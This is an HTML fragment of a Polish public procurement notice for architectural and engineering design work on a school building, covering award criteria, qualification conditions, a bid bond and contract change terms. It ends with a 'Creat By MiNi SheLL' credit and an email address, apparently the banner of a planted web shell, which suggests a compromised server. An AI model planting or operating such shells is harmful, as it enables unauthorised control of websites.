adekwatne do już zastosowanych na kondygnacji II budynku zwłaszcza w zakresie materiałów wykończeniowych posadzek, lamperii i ścian (łazienki i fartuchy za urządzeniami sanitarnymi w pomieszczeniach klasowych), odbojnic systemowych itp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając w ramach poszczególnych kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają niżej określone przez Zamawiającego warunki<br/>udziału w postępowaniu:<br/>1) W zakresie kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu<br/>warunków udziału w postępowaniu.<br/>2) W zakresie sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu<br/>warunków udziału w postępowaniu.<br/>3) W zakresie zdolności technicznej lub zawodowej<br/>a) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonali należycie co<br/>najmniej dwa zamówienia polegające na opracowaniu kompleksowej, wielobranżowej dokumentacji projektowej<br/>budynków/obiektów szkół i innych użyteczności publicznej lub mieszkalnych<br/>b) dysponują co najmniej:<br/>jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej lub<br/>równoważne im uprawnienia wydane według odrębnych przepisów oraz posiadającym aktualną przynależność do właściwej<br/>Izby Inżynierów i Techników Budownictwa zgodnie z obowiązującymi przepisami. Jeżeli potwierdzenie przynależności traci<br/>ważność w okresie obowiązywania umowy, Wykonawca zobowiązuje się przedstawić nowe potwierdzenie, ważne na czas<br/>trwania umowy lub wskaże inną osobę posiadającą przynajmniej takie same uprawnienia (aktualną przynależność do<br/>właściwej Izby Inżynierów Budownictwa).. Na potwierdzenie zdolności zawodowej Wykonawca złoży wraz z ofertą<br/>oświadczenie, że dysponuje osobą posiadającą wymagane uprawnienia, wynikające z postanowień ustawy z dnia 7 lipca<br/>1994 r. - Prawo budowlane (tj. Dz. U. z 2021 r. poz. 2351) do projektowania w specjalności właściwej do realizacji<br/>przedmiotu zamówienia która będzie kierownikiem zespołu projektowego.<br/>oraz<br/>c) jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności: energetycznej lub<br/>równoważne im uprawnienia wydane według odrębnych przepisów oraz posiadającym aktualną przynależność do właściwej<br/>Izby Inżynierów i Techników Budownictwa zgodnie z obowiązującymi przepisami. Jeżeli potwierdzenie przynależności traci<br/>ważność w okresie obowiązywania umowy, Wykonawca zobowiązuje się przedstawić nowe potwierdzenie, ważne na czas<br/>trwania umowy lub wskaże inną osobę posiadającą przynajmniej takie same uprawnienia (aktualną przynależność do<br/>właściwej Izby Inżynierów Budownictwa).. Na potwierdzenie zdolności zawodowej Wykonawca złoży wraz z ofertą<br/>oświadczenie, że dysponuje osobą posiadającą wymagane uprawnienia, wynikające z postanowień ustawy z dnia 7 lipca<br/>1994 r. - Prawo budowlane (tj. Dz. U. z 2021 r. poz. 2351) do projektowania w specjalności właściwej do realizacji<br/>przedmiotu zamówienia która będzie członkiem zespołu projektowego.<br/>oraz<br/>d) jedną osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności sanitarnej lub<br/>równoważne im uprawnienia wydane według odrębnych przepisów oraz posiadającym aktualną przynależność do właściwej<br/>Izby Inżynierów i Techników Budownictwa zgodnie z obowiązującymi przepisami. Jeżeli potwierdzenie przynależności traci<br/>ważność w okresie obowiązywania umowy, Wykonawca zobowiązuje się przedstawić nowe potwierdzenie, ważne na czas<br/>trwania umowy lub wskaże inną osobę posiadającą przynajmniej takie same uprawnienia (aktualną przynależność do<br/>właściwej Izby Inżynierów Budownictwa).. Na potwierdzenie zdolności zawodowej Wykonawca złoży wraz z ofertą<br/>oświadczenie, że dysponuje osobą posiadającą wymagane uprawnienia, wynikające z postanowień ustawy z dnia 7 lipca<br/>1994 r. - Prawo budowlane (tj. Dz. U. z 2021 r. poz. 2351) do projektowania w specjalności właściwej do realizacji<br/>przedmiotu zamówienia która będzie członkiem zespołu projektowego.<br/>UWAGA<br/>W przypadku wykonawców wspólnie ubiegających się o zamówienie, warunek dotyczący uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. (art. 117<br/>pzp)<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do<br/>warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Do oferty Wykonawcazobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o<br/>braku podstaw wykluczenia z postępowania, którego wzór stanowi Załącznik nr 3 i 4 do SWZ. Oświadczenia te składa się pod<br/>rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Informacje zawarte w oświadczeniach, o których mowa w pkt. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału<br/>w postępowaniu.<br/>3. Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, aktualnych na dzień złożenia podmiotowych środków dowodowych</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający będzie wymagał od Wykonawcy złożenia następujących podmiotowych środków dowodowych:<br/>1) Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i<br/>konsumentów (Dz.U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi Załącznik nr 5 do SWZ.<br/>2) W celu potwierdzania spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca składa:<br/>a) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich<br/>3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych<br/>referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>Załącznik nr 6 do SWZ;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie pracami projektowymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z wzorem stanowiącym Załącznik nr 7 do<br/>SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca jest zobowiązany wnieść wadium w wysokości: 500,00 PLN (słownie: pięćset złotych 00/100 PLN)<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach: <br/>1) pieniądzu;<br/>2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;<br/>3) gwarancjach bankowych;<br/>4) gwarancjach ubezpieczeniowych;<br/>5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020 r. poz. 299) <br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: Nr 35 1020 1332 0000 1102 0280 9606.<br/>4. Za skuteczne wniesienie wadium w pieniądzu, zamawiający uzna wadium, które znajdzie się na rachunku bankowym zamawiającego przed upływem terminu składania ofert. <br/>5. W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie zamawiającego, sporządzoną zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, <br/>2) kwotę gwarancji, <br/>3) termin ważności gwarancji w formule: „od dnia ……………………..r. – do dnia …………………………r.”, <br/>4) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze żądanie zamawiającego w sytuacjach określonych w art. 98 ust. 6 p.z.p.<br/>6. W przypadku wnoszenia wadium w formie innej niż pieniężna, oryginał dokumentu wadialnego (gwarancji lub poręczenia) w postaci elektronicznej należy dołączyć do oferty.<br/> 7. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania ofert. <br/>8. Zasady wnoszenia wadium określone w niniejszym Rozdziale dotyczą również przedłużania ważności wadium oraz wnoszenia nowego wadium w przypadkach określonych w ustawie.<br/>9. Zamawiający dokona zwrotu wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem punktu poniżej.<br/>10. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności , o których mowa w art. 57 lub art. 106 ust 1 p.z.p., oświadczenia , o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust.2 pkt 3 p.z.p co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.<br/>11. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.<br/>12. Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego, jeżeli: <br/>1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy,<br/>3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwości zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454 – 455 pzp oraz wskazanym w projektowanych postanowieniach umowy, które zostaną<br/>wprowadzone do umowy w sprawie zamówienia publicznego stanowiących Załącznik nr 2 do SWZ.<br/>4. Zmiana umowy wymaga dla swojej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń:<br/>1) Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu<br/>umowy.<br/>2) Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny<br/>sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej<br/>zapisów przez strony.<br/>3) Wystąpienia konieczności zmian osób Wykonawcy, w przypadku gdy zamawiający uzna, że osoby te nie wykonują<br/>należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany tych osób, na inne spełniające na dzień<br/>składania ofert warunki określone w specyfikacji, w terminie nie dłuższym niż 14 dni od daty złożenia wniosku<br/>zamawiającego,<br/>4) Zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy a także z np. wystąpienia zwłoki w<br/>wydaniu przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń,<br/>5) Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:<br/>a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem,<br/>b) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana numeru rachunku bankowego),<br/>c) zmiany danych teleadresowych,<br/>d) zmiana obowiązującej stawki VAT,<br/>6. W przypadku wystąpienia któregokolwiek ze zdarzeń wymienionych w pkt.5 termin realizacji przedmiotu umowy może<br/>ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie<br/>dłużej jednak niż o okres trwania tych okoliczności.<br/>7. Zamawiający dopuszcza możliwość dokonania zmian w zakresie powierzenia części lub całości wykonania przedmiotu<br/>zamówienia podwykonawcom, poprzez:<br/>1) w przypadku nie przewidzenia podwykonawców w momencie składania oferty, wprowadzenie ich podczas realizacji<br/>zamówienia,<br/>2) rozszerzenie kręgu podwykonawców,<br/>3) zmianę lub wykreślenie podwykonawcy,<br/>4) zmianę zakresu prac powierzonych podwykonawcy,<br/>8. Warunki zmian:<br/>1) inicjowanie zmian – na wniosek wykonawcy lub Zamawiającego<br/>2) uzasadnienie zmian – prawidłowa realizacja przedmiotu umowy,<br/>3) forma zmian – aneks do umowy w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający nie przewiduje zwrotu kosztów postępowania.<br/>2.	Zamawiający nie wymaga wizji lokalnej.<br/>3.	Dla przedmiotowego postępowania nie ma zastosowania żadna z sytuacji określonych w art. 65 ust 1, art. 66 i art. 69 pzp. W związku z powyższym nie zachodzi konieczność komunikowania się z Wykonawcą w sposób inny niż przewidziany w niniejszej SWZ.<br/>4.	Zamawiający nie przewiduje możliwości udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy.<br/>5.	Przedmiot zamówienia nie wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy, osób wykonujących czynności w zakresie realizacji zamówienia w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974r. Kodeks pracy (Dz. U. z 2020 r. poz 1320).

Creat By MiNi SheLL
Email: jattceo@gmail.com